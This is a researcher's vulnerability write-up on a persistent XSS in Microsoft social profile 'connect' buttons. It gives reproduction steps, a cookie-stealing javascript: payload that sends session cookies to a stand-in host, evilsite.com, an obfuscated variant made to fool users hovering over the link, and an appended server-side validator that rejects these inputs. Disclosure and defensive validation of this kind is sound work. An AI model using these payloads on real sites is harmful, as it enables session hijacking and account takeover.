Get your Microsoft account hijacked by simply clicking connect button -Adesh Kolte

Hello

I am Adesh Nandkishor Kolte

An Independent Cyber Security Researcher

The following is my second write-up on a serious Microsoft vulnerability which I discovered on Microsoft.com, and for which I was also awarded a place in the Microsoft Hall of Fame.

Vulnerability Type: Persistent XSS

Affected URL: https://social.microsoft.com/Profile/ADESH_Test_Account
https://social.msdn.microsoft.com/Profile/ADESH_Test_Account

Abstract: The affected URL is vulnerable to persistent XSS, through which an attacker is able to hijack user account sessions.

Scope: Social Connect buttons (Twitter, Facebook, LinkedIn) of the affected URL.

Risk Level: Medium-High

Vulnerability Impact Scenario: A user visits an affected profile and clicks the Facebook icon under the contact section, after which he is redirected to the attacker's Facebook profile, which looks normal to the user. But in the background, his session cookies were first sent as a GET request to the attacker's web server, where they were stored; only after that was the user redirected to the attacker's Facebook profile as he was expecting.

Payload: javascript:location.href=("http://evilsite.com?q.php?cookie="+document.cookie)

Obfuscated Payload: javascript:/*http://facebook.com/profile.php?id=6735824l987&redirect=*/location.href%3D%28%22http%3A%2f%2fevilsite.com%3Fq.php%3Fcookie%3D%22%2bdocument.cookie%29
(Contains noise and obfuscated code so that a normal user is not able to identify the malicious code by just hovering over the social buttons.)

Tools Used:
Firefox + Add-on: TamperData

Vulnerability Reproduction Steps (PoC):

1. Visit the URL "https://social.microsoft.com/Profile/u/edit"

2. Add a Facebook profile URL such as "http://facebook.com/demouser"

3. Open TamperData and click "Start Tampering", then click "Submit" on the edit page.

4. Tamper with the POST request sent to the following URL: "https://social.microsoft.com/Profile/u/edit?displayName=MSOBB_Test_Account"

5. Modify the following POST parameter: name="SocialLink_Facebook"\r\n\r\nhttp://facebook.com/demouser\r\n-------- and replace its value with our payload (mentioned above).

6. Open TamperData and click "Stop Tampering".

7. Now our malicious JavaScript code is embedded in our social profile button.

8. The attack is now performed whenever a user tries to connect with us through our social profile buttons.

Brief description of the issue: The vulnerability I am reporting is caused by the social profile link at the affected URL being validated only on the client side, with no server-side input validation. By modifying the POST request in transit, an attacker is able to supply his own custom malicious code in place of the social profile URL, which can be used to capture the session cookies of the logged-in user.

By capturing the session cookies an attacker is able to completely take over the user's Microsoft account and most of his Microsoft-connected services (tested with Outlook).

During my research I also discovered that the Microsoft Social homepage (https://social.microsoft.com/Profile/) shows a leaderboard of Most Active Contributors. These contributors are visited daily by a large number of users; if an attacker is able to get his malicious profile onto the list, a large number of users can be affected by this vulnerability, which makes it a very serious issue and a cause for concern.
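The root cause described above is validation that lives only in the browser. As an added example that is not part of this write-up or of Microsoft's code, the following Node.js check shows what server-side validation of the social link field looks like: it accepts only an absolute http(s) URL on the expected host and rejects both payloads from the report, including after the normalization a browser's URL parser performs. The function and table names are assumptions.

```javascript
// Added example, not Microsoft's code: server-side validation of a stored
// "social profile link" before it is rendered into an href. Assumes Node.js
// (WHATWG URL class); function and table names are hypothetical.
const ALLOWED_HOSTS = {
  facebook: ['facebook.com', 'www.facebook.com'],
  twitter: ['twitter.com', 'www.twitter.com'],
  linkedin: ['linkedin.com', 'www.linkedin.com'],
};

// Returns a normalized absolute http(s) URL on the expected host, or null
// when the value must be rejected (and the form submission refused).
function validateSocialLink(network, input) {
  if (typeof input !== 'string' || input.length > 2048) return null;
  let url;
  try {
    // The URL parser strips leading/trailing whitespace and embedded tab or
    // newline characters and lowercases the scheme, exactly as browsers do,
    // so "  JavaScript:" and "java\tscript:" both normalize to "javascript:".
    url = new URL(input);
  } catch (e) {
    return null; // relative or unparseable input is never accepted
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  if (url.username !== '' || url.password !== '') return null;
  const hosts = ALLOWED_HOSTS[network];
  if (!hosts || !hosts.includes(url.hostname)) return null;
  return url.href;
}

// Constructed samples: the two payloads from the report plus normalization
// edge cases a validator must survive.
const OBFUSCATED_PAYLOAD =
  'javascript:/*http://facebook.com/profile.php?id=6735824l987&redirect=*/' +
  'location.href%3D%28%22http%3A%2f%2fevilsite.com%3Fq.php%3Fcookie%3D%22%2bdocument.cookie%29';
const SAMPLES = [
  'https://www.facebook.com/demouser',
  'javascript:location.href=("http://evilsite.com?q.php?cookie="+document.cookie)',
  OBFUSCATED_PAYLOAD,
  '  JavaScript:alert(document.cookie)',
  'java\tscript:alert(document.cookie)',
  'https://facebook.com@evilsite.com/profile',
  'https://evilsite.com/facebook.com/demouser',
];

// Maps each sample to the value that would be stored, or null if rejected.
function reviewSamples(network = 'facebook') {
  return SAMPLES.map((s) => [s, validateSocialLink(network, s)]);
}

for (const [input, result] of reviewSamples()) {
  console.log(result === null ? 'REJECT' : 'ACCEPT', JSON.stringify(input));
}
```

Only the first sample is accepted; rejecting at this point, rather than escaping later, also keeps a `javascript:` link out of the profile page's HTML entirely.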

PoC:

Hall Of Fame:

Thanks For Reading :)